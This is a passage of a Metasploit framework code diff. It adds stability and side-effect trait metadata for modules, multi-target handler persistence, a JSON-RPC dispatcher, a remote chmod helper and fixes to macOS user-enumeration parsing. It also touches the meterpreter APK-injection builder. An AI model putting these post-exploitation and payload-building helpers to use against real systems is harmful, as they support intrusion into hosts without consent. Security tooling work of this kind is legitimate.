indent + stability + "\n" + } + output << "\n" + end + + unless mod.reliability.empty? + output << "Module reliability:\n" + mod.reliability.each { |reliability| + output << indent + reliability + "\n" + } + output << "\n" + end + + output + end + # Dumps information about an exploit module. # # @param mod [Msf::Exploit] the exploit module. @@ -219,6 +249,8 @@ class ReadableText } output << "\n" + output << dump_traits(mod) + # Targets output << "Available targets:\n" output << dump_exploit_targets(mod, indent) @@ -282,6 +314,8 @@ class ReadableText } output << "\n" + output << dump_traits(mod) + # Actions if mod.action output << "Available actions:\n" @@ -335,6 +369,8 @@ class ReadableText end output << "\n" + output << dump_traits(mod) + # Compatible session types if mod.session_types output << "Compatible session types:\n" @@ -478,6 +514,8 @@ class ReadableText } output << "\n" + output << dump_traits(mod) + # Description output << "Description:\n" output << word_wrap(Rex::Text.compress(mod.description)) diff --git a/lib/msf/base/simple/exploit.rb b/lib/msf/base/simple/exploit.rb index 09e670ffd9..eb4acd7e3d 100644 --- a/lib/msf/base/simple/exploit.rb +++ b/lib/msf/base/simple/exploit.rb @@ -78,6 +78,9 @@ module Exploit # Start it up driver = ExploitDriver.new(exploit.framework) + # Keep the handler of driver running if exploit multi targets. + driver.keep_handler = true if opts["multi"] + # Initialize the driver instance driver.exploit = exploit driver.payload = exploit.framework.payloads.create(opts['Payload']) diff --git a/lib/msf/core/constants.rb b/lib/msf/core/constants.rb index 2dafc568c9..69ffdc35db 100644 --- a/lib/msf/core/constants.rb +++ b/lib/msf/core/constants.rb @@ -51,6 +51,53 @@ RankingName = ExcellentRanking => "excellent" } +# +# Stability traits +# + +# Module should not crash the service +CRASH_SAFE = 'crash-safe' +# Module may crash the service, but the service restarts. +CRASH_SERVICE_RESTARTS = 'crash-service-restarts' +# Module may crash the service, and the service remains down. +CRASH_SERVICE_DOWN = 'crash-service-down' +# Module may crash the OS, but the OS restarts. +CRASH_OS_RESTARTS = 'crash-os-restarts' +# Module may crash the OS, and the OS remains down. +CRASH_OS_DOWN = 'crash-os-down' +# Module may cause a resource (such as a file or data in database) to be unavailable for the service. +SERVICE_RESOURCE_LOSS = 'service-resource-loss' +# Modules may cause a resource (such as a file) to be unavailable for the OS. +OS_RESOURCE_LOSS = 'os-resource-loss' + +# +# Side-effect traits +# + +# Modules leaves payload or a dropper on the target machine +ARTIFACTS_ON_DISK = 'artifacts-on-disk' +# Module modifies some config file on the target machine +CONFIG_CHANGES = 'config-changes' +# Module leaves signs of a compromise in a log file (Example: SQL injection data found in HTTP log) +IOC_IN_LOGS = 'ioc-in-logs' +# Module may cause account lockouts (likely due to brute-forcing) +ACCOUNT_LOCKOUTS = 'account-lockouts' +# Module may show something on the screen (Example: a window pops up) +SCREEN_EFFECTS = 'screen-effects' +# Module may cause a noise (Examples: audio output from the speakers or hardware beeps) +AUDIO_EFFECTS = 'audio-effects' +# Module may produce physical effects (Examples: the device makes movement or flashes LEDs) +PHYSICAL_EFFECTS = 'physical-effects' + +# +# Reliability +# + +# The module tends to fail to get a session at first attempt +FIRST_ATTEMPT_FAIL = 'first-attempt-fail' +# The module is expected to get a shell every time it fires +REPEATABLE_SESSION = 'repeatable-session' + module HttpClients IE = "MSIE" FF = "Firefox" diff --git a/lib/msf/core/db_manager/http/servlet_helper.rb b/lib/msf/core/db_manager/http/servlet_helper.rb index f247a8a0d5..e9dbe63cac 100644 --- a/lib/msf/core/db_manager/http/servlet_helper.rb +++ b/lib/msf/core/db_manager/http/servlet_helper.rb @@ -19,6 +19,11 @@ module ServletHelper set_json_data_response(response: '') end + def set_raw_response(data, code: 200) + headers = { 'Content-Type' => 'application/json' } + [code, headers, data] + end + def set_json_response(data, includes = nil, code = 200) headers = { 'Content-Type' => 'application/json' } [code, headers, to_json(data, includes)] diff --git a/lib/msf/core/exploit.rb b/lib/msf/core/exploit.rb index 02454d568f..8c47048f7a 100644 --- a/lib/msf/core/exploit.rb +++ b/lib/msf/core/exploit.rb @@ -1409,6 +1409,12 @@ class Exploit < Msf::Module self.print_error("Exploit failed [#{self.fail_reason}]: #{msg}") elog("Exploit failed (#{self.refname}): #{msg}", 'core', LEV_0) dlog("Call stack:\n#{e.backtrace.join("\n")}", 'core', LEV_3) + + when ::Interrupt + self.fail_reason = Msf::Exploit::Failure::UserInterrupt + self.print_error("Exploit failed [#{self.fail_reason}]: #{msg}") + elog("Exploit failed (#{self.refname}): #{msg}", 'core', LEV_0) + dlog("Call stack:\n#{e.backtrace.join("\n")}", 'core', LEV_3) else # Compare as a string since not all error classes may be loaded @@ -1450,6 +1456,8 @@ class Exploit < Msf::Module # Interrupt any session waiters in the handler self.interrupt_handler + + return self.fail_reason end def report_failure diff --git a/lib/msf/core/exploit_driver.rb b/lib/msf/core/exploit_driver.rb index 7debf1419d..e7fc00f54b 100644 --- a/lib/msf/core/exploit_driver.rb +++ b/lib/msf/core/exploit_driver.rb @@ -22,6 +22,7 @@ class ExploitDriver self.use_job = false self.job_id = nil self.force_wait_for_session = false + self.keep_handler = false self.semaphore = Mutex.new end @@ -164,8 +165,15 @@ class ExploitDriver # settings until after they're done. ctx = [ exploit, payload ] - job_run_proc(ctx) - job_cleanup_proc(ctx) + begin + job_run_proc(ctx) + # For multi exploit targets. + # Keep the payload handler until last target or interrupt + job_cleanup_proc(ctx) unless keep_handler + rescue ::Interrupt + job_cleanup_proc(ctx) + raise $! + end end return session @@ -181,6 +189,7 @@ class ExploitDriver attr_accessor :job_id attr_accessor :force_wait_for_session # :nodoc: attr_accessor :session # :nodoc: + attr_accessor :keep_handler # :nodoc: # To synchronize threads cleaning up the exploit and the handler attr_accessor :semaphore @@ -211,7 +220,7 @@ protected delay = 0.01 end - exploit.handle_exception e + fail_reason = exploit.handle_exception(e) end # Start bind handlers after exploit completion @@ -237,6 +246,10 @@ protected exploit.fail_detail = "No session created" exploit.report_failure end + + if fail_reason && fail_reason == Msf::Exploit::Failure::UserInterrupt + raise ::Interrupt + end end # diff --git a/lib/msf/core/module.rb b/lib/msf/core/module.rb index a6e274f9aa..71fbf82fc0 100644 --- a/lib/msf/core/module.rb +++ b/lib/msf/core/module.rb @@ -39,6 +39,9 @@ class Module autoload :Type, 'msf/core/module/type' autoload :UI, 'msf/core/module/ui' autoload :UUID, 'msf/core/module/uuid' + autoload :SideEffects, 'msf/core/module/side_effects' + autoload :Stability, 'msf/core/module/stability' + autoload :Reliability, 'msf/core/module/reliability' include Msf::Module::Arch include Msf::Module::Auth @@ -56,6 +59,9 @@ class Module include Msf::Module::Type include Msf::Module::UI include Msf::Module::UUID + include Msf::Module::SideEffects + include Msf::Module::Stability + include Msf::Module::Reliability # The key where a comma-separated list of Ruby module names will live in the # datastore, consumed by #replicant to allow clean override of MSF module methods. diff --git a/lib/msf/core/module/reliability.rb b/lib/msf/core/module/reliability.rb new file mode 100644 index 0000000000..4b9778f492 --- /dev/null +++ b/lib/msf/core/module/reliability.rb @@ -0,0 +1,18 @@ +module Msf::Module::Reliability + extend ActiveSupport::Concern + + module ClassMethods + def reliability + instance = self.new + instance.notes['Reliability'] || [] + end + end + + def reliability + self.class.reliability + end + + def reliability_to_s + reliability * ', ' + end +end \ No newline at end of file diff --git a/lib/msf/core/module/side_effects.rb b/lib/msf/core/module/side_effects.rb new file mode 100644 index 0000000000..2c895ef6d5 --- /dev/null +++ b/lib/msf/core/module/side_effects.rb @@ -0,0 +1,19 @@ +module Msf::Module::SideEffects + extend ActiveSupport::Concern + + module ClassMethods + def side_effects + instance = self.new + instance.notes['SideEffects'] || [] + end + end + + def side_effects + self.class.side_effects + end + + def side_effects_to_s + side_effects * ', ' + end + +end diff --git a/lib/msf/core/module/stability.rb b/lib/msf/core/module/stability.rb new file mode 100644 index 0000000000..12d5fbfb40 --- /dev/null +++ b/lib/msf/core/module/stability.rb @@ -0,0 +1,19 @@ +module Msf::Module::Stability + extend ActiveSupport::Concern + + module ClassMethods + def stability + instance = self.new + instance.notes['Stability'] || [] + end + end + + def stability + self.class.stability + end + + def stability_to_s + stability * ', ' + end + +end diff --git a/lib/msf/core/modules/external/shim.rb b/lib/msf/core/modules/external/shim.rb index d9588e2286..495e93d9d1 100644 --- a/lib/msf/core/modules/external/shim.rb +++ b/lib/msf/core/modules/external/shim.rb @@ -144,6 +144,8 @@ class Msf::Modules::External::Shim # ensure that they are properly capitalized before rendering. # def self.transform_notes(notes) + return {} unless notes + notes.reduce({}) do |acc, (key, val)| acc[key.upcase] = val acc diff --git a/lib/msf/core/modules/loader/base.rb b/lib/msf/core/modules/loader/base.rb index 84715bc729..fa1e0f0463 100644 --- a/lib/msf/core/modules/loader/base.rb +++ b/lib/msf/core/modules/loader/base.rb @@ -504,9 +504,7 @@ class Msf::Modules::Loader::Base # Returns an Array of names to make a fully qualified module name to # wrap the MetasploitModule class so that it doesn't overwrite other - # (metasploit) module's classes. Invalid module name characters are - # escaped by using 'H*' unpacking and prefixing each code with X so - # the code remains a valid module name when it starts with a digit. + # (metasploit) module's classes. # # @param [String] module_full_name The unique canonical name # for the module including type. @@ -514,7 +512,18 @@ class Msf::Modules::Loader::Base # # @see namespace_module def namespace_module_names(module_full_name) - NAMESPACE_MODULE_NAMES + [ "Mod" + module_full_name.unpack("H*").first.downcase ] + relative_name = module_full_name.split('/').map(&:capitalize).join('__') + NAMESPACE_MODULE_NAMES + [relative_name] + end + + # This reverses a namespace module's relative name to a module full name + # + # @param [String] relative_name The namespace module's relative name + # @return [String] The module full name + # + # @see namespace_module_names + def reverse_relative_name(relative_name) + relative_name.split('__').map(&:downcase).join('/') end def namespace_module_transaction(module_full_name, options={}, &block) diff --git a/lib/msf/core/modules/metadata/obj.rb b/lib/msf/core/modules/metadata/obj.rb index 870548ecfb..83717e9029 100644 --- a/lib/msf/core/modules/metadata/obj.rb +++ b/lib/msf/core/modules/metadata/obj.rb @@ -35,6 +35,10 @@ class Obj attr_reader :arch # @return [Integer] attr_reader :rport + # @return [Array] + attr_reader :autofilter_ports + # @return [Array] + attr_reader :autofilter_services # @return [Array] attr_reader :targets # @return [Time] @@ -80,6 +84,12 @@ class Obj @path = module_instance.file_path @mod_time = ::File.mtime(@path) rescue Time.now @ref_name = module_instance.refname + if module_instance.respond_to?(:autofilter_ports) + @autofilter_ports = module_instance.autofilter_ports + end + if module_instance.respond_to?(:autofilter_services) + @autofilter_services = module_instance.autofilter_services + end install_path = Msf::Config.install_root.to_s if (@path.to_s.include? (install_path)) @@ -118,6 +128,8 @@ class Obj 'platform' => @platform, 'arch' => @arch, 'rport' => @rport, + 'autofilter_ports' => @autofilter_ports, + 'autofilter_services'=> @autofilter_services, 'targets' => @targets, 'mod_time' => @mod_time.to_s, 'path' => @path, diff --git a/lib/msf/core/payload/apk.rb b/lib/msf/core/payload/apk.rb index 964f8bf8db..c3e4d0f114 100644 --- a/lib/msf/core/payload/apk.rb +++ b/lib/msf/core/payload/apk.rb @@ -264,8 +264,9 @@ class Msf::Payload::Apk fix_manifest(tempdir, package, classes['MainService'], classes['MainBroadcastReceiver']) print_status "Rebuilding #{apkfile} with meterpreter injection as #{injected_apk}\n" - run_cmd("apktool b -o #{injected_apk} #{tempdir}/original") + apktool_output = run_cmd("apktool b -o #{injected_apk} #{tempdir}/original") unless File.readable?(injected_apk) + print_error apktool_output raise RuntimeError, "Unable to rebuild apk with apktool" end diff --git a/lib/msf/core/post/file.rb b/lib/msf/core/post/file.rb index 8cbe7640c0..ea69578a79 100644 --- a/lib/msf/core/post/file.rb +++ b/lib/msf/core/post/file.rb @@ -361,6 +361,23 @@ module Msf::Post::File write_file(remote, ::File.read(local)) end + # + # Sets the permissions on a remote file + # + # @param path [String] Path on the remote filesystem + # @param mode [Fixnum] Mode as an octal number + def chmod(path, mode = 0700) + if session.platform == 'windows' + raise "`chmod' method does not support Windows systems" + end + + if session.type == 'meterpreter' && session.commands.include?('stdapi_fs_chmod') + session.fs.file.chmod(path, mode) + else + cmd_exec("chmod #{mode.to_s(8)} '#{path}'") + end + end + # # Delete remote files # diff --git a/lib/msf/core/post/osx/system.rb b/lib/msf/core/post/osx/system.rb index 51dccf89e2..ca59a54902 100644 --- a/lib/msf/core/post/osx/system.rb +++ b/lib/msf/core/post/osx/system.rb @@ -27,14 +27,15 @@ module Msf::Post::OSX::System def get_users cmd_output = cmd_exec("/usr/bin/dscacheutil -q user") users = [] - users_arry = cmd_output.split("\n\n") + users_arry = cmd_output.tr("\r", "").split("\n\n") users_arry.each do |u| entry = Hash.new u.each_line do |l| field,val = l.chomp.split(": ") next if field == "password" - entry[field] = val.chomp - + unless val.nil? + entry[field] = val.strip + end end users << entry end @@ -48,15 +49,17 @@ module Msf::Post::OSX::System def get_system_accounts cmd_output = cmd_exec("/usr/bin/dscacheutil -q user") users = [] - users_arry = cmd_output.split("\n\n") + users_arry = cmd_output.tr("\r", "").split("\n\n") users_arry.each do |u| entry = {} u.each_line do |l| field,val = l.chomp.split(": ") next if field == "password" - entry[field] = val.chomp + unless val.nil? + entry[field] = val.strip + end end - next if entry["name"] !~ /^_/ + next if entry["name"][0] != '_' users << entry end return users @@ -69,15 +72,17 @@ module Msf::Post::OSX::System def get_nonsystem_accounts cmd_output = cmd_exec("/usr/bin/dscacheutil -q user") users = [] - users_arry = cmd_output.split("\n\n") + users_arry = cmd_output.tr("\r", "").split("\n\n") users_arry.each do |u| entry = {} u.each_line do |l| field,val = l.chomp.split(": ") next if field == "password" - entry[field] = val.chomp + unless val.nil? + entry[field] = val.strip + end end - next if entry["name"] =~ /^_/ + next if entry["name"][0] == '_' users << entry end return users @@ -96,8 +101,9 @@ module Msf::Post::OSX::System u.each_line do |l| field,val = l.chomp.split(": ") next if field == "password" - entry[field] = val.chomp - + unless val.nil? + entry[field] = val.strip + end end groups << entry end diff --git a/lib/msf/core/rpc.rb b/lib/msf/core/rpc.rb index 7558682bf2..f20dd1a823 100644 --- a/lib/msf/core/rpc.rb +++ b/lib/msf/core/rpc.rb @@ -1,14 +1,35 @@ # -*- coding: binary -*- -require "msf/core/rpc/service" -require "msf/core/rpc/client" +module Msf::RPC + require 'msf/core/rpc/v10/constants' -require "msf/core/rpc/base" -require "msf/core/rpc/auth" -require "msf/core/rpc/core" -require "msf/core/rpc/session" -require "msf/core/rpc/module" -require "msf/core/rpc/job" -require "msf/core/rpc/console" -require "msf/core/rpc/db" -require "msf/core/rpc/plugin" + require 'msf/core/rpc/v10/service' + require 'msf/core/rpc/v10/client' + require 'msf/core/rpc/v10/rpc_auth' + require 'msf/core/rpc/v10/rpc_base' + require 'msf/core/rpc/v10/rpc_console' + require 'msf/core/rpc/v10/rpc_core' + require 'msf/core/rpc/v10/rpc_db' + require 'msf/core/rpc/v10/rpc_job' + require 'msf/core/rpc/v10/rpc_module' + require 'msf/core/rpc/v10/rpc_plugin' + require 'msf/core/rpc/v10/rpc_session' + + + module JSON + autoload :Dispatcher, 'msf/core/rpc/json/dispatcher' + autoload :DispatcherHelper, 'msf/core/rpc/json/dispatcher_helper' + autoload :RpcCommand, 'msf/core/rpc/json/rpc_command' + autoload :RpcCommandFactory, 'msf/core/rpc/json/rpc_command_factory' + + # exception classes + autoload :Error, 'msf/core/rpc/json/error' + autoload :ParseError, 'msf/core/rpc/json/error' + autoload :InvalidRequest, 'msf/core/rpc/json/error' + autoload :MethodNotFound, 'msf/core/rpc/json/error' + autoload :InvalidParams, 'msf/core/rpc/json/error' + autoload :InternalError, 'msf/core/rpc/json/error' + autoload :ServerError, 'msf/core/rpc/json/error' + autoload :ApplicationServerError, 'msf/core/rpc/json/error' + end +end diff --git a/lib/msf/core/rpc/json/dispatcher.rb b/lib/msf/core/rpc/json/dispatcher.rb new file mode 100644 index 0000000000..bf2bbe26c0 --- /dev/null +++ b/lib/msf/core/rpc/json/dispatcher.rb @@ -0,0 +1,216 @@ +require 'json' +require 'msf/core/rpc' + +module Msf::RPC::JSON + class Dispatcher + JSON_RPC_VERSION = '2.0' + JSON_RPC_REQUIRED_MEMBERS = %i(jsonrpc method) + JSON_RPC_MEMBER_TYPES = { + # A String specifying the version of the JSON-RPC protocol. + jsonrpc: [String], + # A String containing the name of the method to be invoked. + method: [String], + # If present, parameters for the rpc call MUST be provided as a Structured + # value. Either by-position through an Array or by-name through an Object. + # * by-position: params MUST be an Array, containing the values in the + # Server expected order. + # * by-name: params MUST be an Object, with member names that match the + # Server expected parameter names. The absence of expected names MAY + # result in an error being generated. The names MUST match exactly, + # including case, to the method's expected parameters. + params: [Array, Hash], + # An identifier established by the Client that MUST contain a String, + # Number, or NULL value if included. If it is not included it is assumed + # to be a notification. The value SHOULD normally not be Null [1] and + # Numbers SHOULD NOT contain fractional parts [2] + id: [Integer, String, NilClass] + } + + attr_reader :framework + attr_reader :command + + # Instantiate a Dispatcher. + # @param framework [Msf::Simple::Framework] Framework wrapper instance + def initialize(framework) + @framework = framework + @command = nil + end + + # Set the command. + # @param command [RpcCommand] the command used by the Dispatcher. + def set_command(command) + @command = command + end + + # Process the JSON-RPC request. + # @param source [String] the JSON-RPC request + # @return [String] JSON-RPC response that encapsulates the RPC result + # if successful; otherwise, a JSON-RPC error response. + def process(source) + begin + request = parse_json_request(source) + if request.is_a?(Array) + # If the batch rpc call itself fails to be recognized as an valid + # JSON or as an Array with at least one value, the response from + # the Server MUST be a single Response object. + raise InvalidRequest.new if request.empty? + # process batch request + response = request.map { |r| process_request(r) } + # A Response object SHOULD exist for each Request object, except that + # there SHOULD NOT be any Response objects for notifications. + # Remove nil responses from response array + response.compact! + else + response = process_request(request) + end + rescue ParseError, InvalidRequest => e + # If there was an error in detecting the id in the Request object + # (e.g. Parse error/Invalid Request), then the id member MUST be + # Null. Don't pass request obj when building the error response. + response = self.class.create_error_response(e) + rescue RpcError => e + # other JSON-RPC errors should include the id from the Request object + response = self.class.create_error_response(e, request) + rescue => e + response = self.class.create_error_response(ApplicationServerError.new(e), request) + end + + # When a rpc call is made, the Server MUST reply with a Response, except + # for in the case of Notifications. The Response is expressed as a single + # JSON Object. + self.class.to_json(response) + end + + # Validate and execute the JSON-RPC request. + # @param request [Hash] the JSON-RPC request + # @returns [RpcCommand] an RpcCommand for the specified version + # @raise [InvalidParams] ArgumentError occurred during execution. + # @raise [ApplicationServerError] General server-error wrapper around an + # Msf::RPC::Exception that occurred during execution. + # @returns [Hash] JSON-RPC response that encapsulates the RPC result + # if successful; otherwise, a JSON-RPC error response. + def process_request(request) + begin + if !validate_rpc_request(request) + response = self.class.create_error_response(InvalidRequest.new) + return response + end + + # dispatch method execution to command + result = @command.execute(request[:method], request[:params]) + + # A Notification is a Request object without an "id" member. A Request + # object that is a Notification signifies the Client's lack of interest + # in the corresponding Response object, and as such no Response object + # needs to be returned to the client. The Server MUST NOT reply to a + # Notification, including those that are within a batch request. + if request.key?(:id) + response = self.class.create_success_response(result, request) + else + response = nil + end + + response + rescue ArgumentError + raise InvalidParams.new + rescue Msf::RPC::Exception => e + raise ApplicationServerError.new(e.message, data: { code: e.code }) + end + end + + # Validate the JSON-RPC request. + # @param request [Hash] the JSON-RPC request + # @returns [Boolean] true if the JSON-RPC request is a valid; otherwise, false. + def validate_rpc_request(request) + # validate request is an object + return false unless request.is_a?(Hash) + + # validate request contains required members + JSON_RPC_REQUIRED_MEMBERS.each { |member| return false unless request.key?(member) } + + return false if request[:jsonrpc] != JSON_RPC_VERSION + + # validate request members are correct types + request.each do |member, value| + return false if JSON_RPC_MEMBER_TYPES.key?(member) && + !JSON_RPC_MEMBER_TYPES[member].one? { |type| value.is_a?(type) } + end + + true + end + + # Parse the JSON document source into a Hash or Array with symbols for the names (keys). + # @param source [String] the JSON source + # @raise [ParseError] Invalid JSON was received by the server. + # An error occurred on the server while parsing the JSON text. + # @return [Hash or Array] Hash or Array representation of source + def parse_json_request(source) + begin + JSON.parse(source, symbolize_names: true) + rescue + raise ParseError.new + end + end + + # Serialize data as JSON string. + # @param data [Hash] data + # @return [String] data serialized JSON string if data not nil; otherwise, nil. + def self.to_json(data) + return nil if data.nil? + + json = data.to_json + return json.to_s + end + + # Create a JSON-RPC success response. + # @param result [Object] the RPC method's return value + # @param request [Hash] the JSON-RPC request + # @returns [Hash] JSON-RPC success response. + def self.create_success_response(result, request = nil) + response = { + # A String specifying the version of the JSON-RPC protocol. + jsonrpc: JSON_RPC_VERSION, + + # This member is REQUIRED on success. + # This member MUST NOT exist if there was an error invoking the method. + # The value of this member is determined by the method invoked on the Server. + result: result + } + + self.add_response_id_member(response, request) + + response + end + + # Create a JSON-RPC error response. + # @param error [RpcError] a RpcError instance + # @param request [Hash] the JSON-RPC request + # @returns [Hash] JSON-RPC error response. + def self.create_error_response(error, request = nil) + response = { + # A String specifying the version of the JSON-RPC protocol. + jsonrpc: JSON_RPC_VERSION, + + # This member is REQUIRED on error. + # This member MUST NOT exist if there was no error triggered during invocation. + # The value for this member MUST be an Object as defined in section 5.1. + error: error.to_h + } + + self.add_response_id_member(response, request) + + response + end + + # Adds response id based on request id. + # @param response [Hash] the JSON-RPC response + # @param request [Hash] the JSON-RPC request + def self.add_response_id_member(response, request) + if !request.nil? && request.key?(:id) + response[:id] = request[:id] + else + response[:id] = nil + end + end + end +end \ No newline at end of file diff --git a/lib/msf/core/rpc/json/dispatcher_helper.rb b/lib/msf/core/rpc/json/dispatcher_helper.rb new file mode 100644 index 0000000000..17d103f765 --- /dev/null +++ b/lib/msf/core/rpc/json/dispatcher_helper.rb @@ -0,0 +1,31 @@ +require 'msf/core/rpc' + +module Msf::RPC::JSON + module DispatcherHelper + # Get an RPC Dispatcher for the RPC version. Creates a new instance and stores + # it in the dispatchers hash if one does not already exist for the version. + # @param dispatchers [Hash] hash of version Symbol - Msf::RPC::JSON::Dispatcher object pairs + # @param version [Symbol] the RPC version + # @param framework [Msf::Simple::Framework] Framework wrapper instance + # @returns [Msf::RPC::JSON::Dispatcher] an RPC Dispatcher for the specified version + def get_dispatcher(dispatchers, version, framework) + unless dispatchers.key?(version) + dispatchers[version] = create_dispatcher(version, framework) + end + + dispatchers[version] + end + + # Create an RPC Dispatcher composed of an RpcCommand for the provided version. + # @param version [Symbol] the RPC version + # @param framework [Msf::Simple::Framework] Framework wrapper instance + # @returns [Msf::RPC::JSON::Dispatcher] an RPC Dispatcher for the specified version + def create_dispatcher(version, framework) + command = RpcCommandFactory.create(version, framework) + dispatcher = Dispatcher.new(framework) + dispatcher.set_command(command) + + dispatcher + end + end +end \ No newline at end of file diff --git a/lib/msf/core/rpc/json/error.rb b/lib/msf/core/rpc/json/error.rb new file mode 100644 index 0000000000..f1db564324 --- /dev/null +++ b/lib/msf/core/rpc/json/error.rb @@ -0,0 +1,136 @@ +module Msf::RPC::JSON + + # JSON-RPC 2.0 Error Codes + ## Specification errors: + PARSE_ERROR = -32700 + INVALID_REQUEST = -32600 + METHOD_NOT_FOUND = -32601 + INVALID_PARAMS = -32602 + INTERNAL_ERROR = -32603 + ## Implementation-defined server-errors: + SERVER_ERROR_MAX = -32000 + SERVER_ERROR_MIN = -32099 + APPLICATION_SERVER_ERROR = -32000 + + # JSON-RPC 2.0 Error Messages + ERROR_MESSAGES = { + # Specification errors: + PARSE_ERROR => 'Invalid JSON was received by the server. An error occurred on the server while parsing the JSON text.', + INVALID_REQUEST => 'The JSON sent is not a valid Request object.', + METHOD_NOT_FOUND => 'The method %s does not exist.', + INVALID_PARAMS => 'Invalid method parameter(s).', + INTERNAL_ERROR => 'Internal JSON-RPC error', + # Implementation-defined server-errors: + APPLICATION_SERVER_ERROR => 'Application server error: %s', + } + + # Base class for all Msf::RPC::JSON exceptions. + class RpcError < StandardError + # Code Message Meaning + # -32700 Parse error Invalid JSON was received by the server. An error + # occurred on the server while parsing the JSON text. + # -32600 Invalid Request The JSON sent is not a valid Request object. + # -32601 Method not found The method does not exist / is not available. + # -32602 Invalid params Invalid method parameter(s). + # -32603 Internal error Internal JSON-RPC error. + # -32000 to -32099 Server error Reserved for implementation-defined server-errors. + + attr_reader :code + attr_reader :message + attr_reader :data + + # Instantiate an RpcError object. + # + # @param code [Integer] A Number that indicates the error type that occurred. + # @param message [String] A String providing a short description of the error. + # The message SHOULD be limited to a concise single sentence. + # @param data [Object] A Primitive or Structured value that contains additional + # information about the error. This may be omitted. The value of this member is + # defined by the Server (e.g. detailed error information, nested errors etc.). + # The default value is nil. + def initialize(code, message, data: nil) + super(message) + @code = code + @message = message + @data = data + end + + def to_h + hash = { + code: @code, + message: @message + } + + # process data member + unless @data.nil? + if @data.is_a?(String) || @data.kind_of?(Numeric) || @data.is_a?(Array) || @data.is_a?(Hash) + hash[:data] = @data + elsif @data.respond_to?(:to_h) + hash[:data] = @data.to_h + else + hash[:data] = @data.to_s + end + end + + hash + end + end + + class ParseError < RpcError + def initialize(data: nil) + super(PARSE_ERROR, ERROR_MESSAGES[PARSE_ERROR], data: data) + end + end + + class InvalidRequest < RpcError + def initialize(data: nil) + super(INVALID_REQUEST, ERROR_MESSAGES[INVALID_REQUEST], data: data) + end + end + + class MethodNotFound < RpcError + def initialize(method, data: nil) + super(METHOD_NOT_FOUND, ERROR_MESSAGES[METHOD_NOT_FOUND] % {name: method}, data: data) + end + end + + class InvalidParams < RpcError + def initialize(data: nil) + super(INVALID_PARAMS, ERROR_MESSAGES[INVALID_PARAMS], data: data) + end + end + + class InternalError < RpcError + def initialize(e, data: nil) + super(INTERNAL_ERROR, "#{ERROR_MESSAGES[INTERNAL_ERROR]}: #{e}", data: data) + end + end + + # Class is reserved for implementation-defined server-error exceptions. + class ServerError < RpcError + + # Instantiate a ServerError object. + # + # @param code [Integer] A Number that indicates the error type that occurred. + # The code must be between -32000 and -32099. + # @param message [String] A String providing a short description of the error. + # The message SHOULD be limited to a concise single sentence. + # @param data [Object] A Primitive or Structured value that contains additional + # information about the error. This may be omitted. The value of this member is + # defined by the Server (e.g. detailed error information, nested errors etc.). + # The default value is nil. + # @raise [ArgumentError] Module not found (either the wrong type or name). + def initialize(code, message, data: nil) + if code < SERVER_ERROR_MIN || code > SERVER_ERROR_MAX + raise ArgumentError.new("invalid code #{code}, must be between #{SERVER_ERROR_MAX} and #{SERVER_ERROR_MIN}") + end + super(code, message, data: data) + end + end + + class ApplicationServerError < ServerError + def initialize(message, data: nil) + super(APPLICATION_SERVER_ERROR, ERROR_MESSAGES[APPLICATION_SERVER_ERROR] % {msg: message}, data: data) + end + end +end diff --git a/lib/msf/core/rpc/json/rpc_command.rb b/lib/msf/core/rpc/json/rpc_command.rb new file mode 100644 index 0000000000..aa650393ea --- /dev/null +++ b/lib/msf/core/rpc/json/rpc_command.rb @@ -0,0 +1,53 @@ +module Msf::RPC::JSON + class RpcCommand + attr_reader :framework + attr_accessor :execute_timeout + + # Instantiate an RpcCommand. + # @param framework [Msf::Simple::Framework] Framework wrapper instance + # @param execute_timeout [Integer] execute timeout duration in seconds + def initialize(framework, execute_timeout: 7200) + @framework = framework + @execute_timeout = execute_timeout + @methods = {} + end + + # Add a method to the RPC Command + # @param method [Method] the Method + # @param name [String] the name the method is register under. The method name is used if nil. + # @returns [Method] the Method. + def register_method(method, name: nil) + if name.nil? + if method.is_a?(Method) + name = method.name.to_s + else + name = method.to_s + end + end + @methods[name] = method + end + + # Invokes the method on the receiver object with the specified params, + # returning the method's return value. + # @param method [String] the RPC method name + # @param params [Array, Hash] parameters for the RPC call + # @raise [MethodNotFound] The method does not exist + # @raise [Timeout::Error] The method failed to terminate in @execute_timeout seconds + # @returns [Object] the method's return value. + def execute(method, params) + unless @methods.key?(method) + raise MethodNotFound.new(method) + end + + ::Timeout.timeout(@execute_timeout) do + if params.nil? + return @methods[method].call() + elsif params.is_a?(Array) + return @methods[method].call(*params) + else + return @methods[method].call(**params) + end + end + end + end +end \ No newline at end of file diff --git a/lib/msf/core/rpc/json/rpc_command_factory.rb b/lib/msf/core/rpc/json/rpc_command_factory.rb new file mode 100644 index 0000000000..e67739da40 --- /dev/null +++ b/lib/msf/core/rpc/json/rpc_command_factory.rb @@ -0,0 +1,43 @@ +require 'msf/core/rpc' +require 'msf/core/rpc/json/v1_0/rpc_command' +require 'msf/core/rpc/json/v2_0/rpc_test' + +module Msf::RPC::JSON + class RpcCommandFactory + # Create an RpcCommand for the provided version. + # @param version [Symbol] the RPC version + # @param framework [Msf::Simple::Framework] Framework wrapper instance + # @raise [ArgumentError] invalid RPC version + # @returns [RpcCommand] an RpcCommand for the specified version + def self.create(version, framework) + case version + when :v1, :v1_0, :v10 + return Msf::RPC::JSON::V1_0::RpcCommand.new(framework) + when :v2, :v2_0 + return RpcCommandFactory.create_rpc_command_v2_0(framework) + else + raise ArgumentError.new("invalid RPC version #{version}") + end + end + + # Creates an RpcCommand for a demonstration RPC version 2.0. + # @param framework [Msf::Simple::Framework] Framework wrapper instance + # @returns [RpcCommand] an RpcCommand for a demonstration RPC version 2.0 + def self.create_rpc_command_v2_0(framework) + # TODO: does belong in some sort of loader class for an RPC version? + # instantiate receiver + rpc_test = Msf::RPC::JSON::V2_0::RpcTest.new() + + command = Msf::RPC::JSON::RpcCommand.new(framework) + + # Add class methods + command.register_method(Msf::RPC::JSON::V2_0::RpcTest.method(:add)) + command.register_method(Msf::RPC::JSON::V2_0::RpcTest.method(:add), name: 'add_alias') + # Add instance methods + command.register_method(rpc_test.method(:get_instance_rand_num)) + command.register_method(rpc_test.method(:add_instance_rand_num)) + + command + end + end +end \ No newline at end of file diff --git a/lib/msf/core/rpc/json/v1_0/rpc_command.rb b/lib/msf/core/rpc/json/v1_0/rpc_command.rb new file mode 100644 index 0000000000..f1032176fb --- /dev/null +++ b/lib/msf/core/rpc/json/v1_0/rpc_command.rb @@ -0,0 +1,152 @@ +require 'base64' +require 'msf/core/rpc' + +module Msf::RPC::JSON + module V1_0 + class RpcCommand < ::Msf::RPC::JSON::RpcCommand + 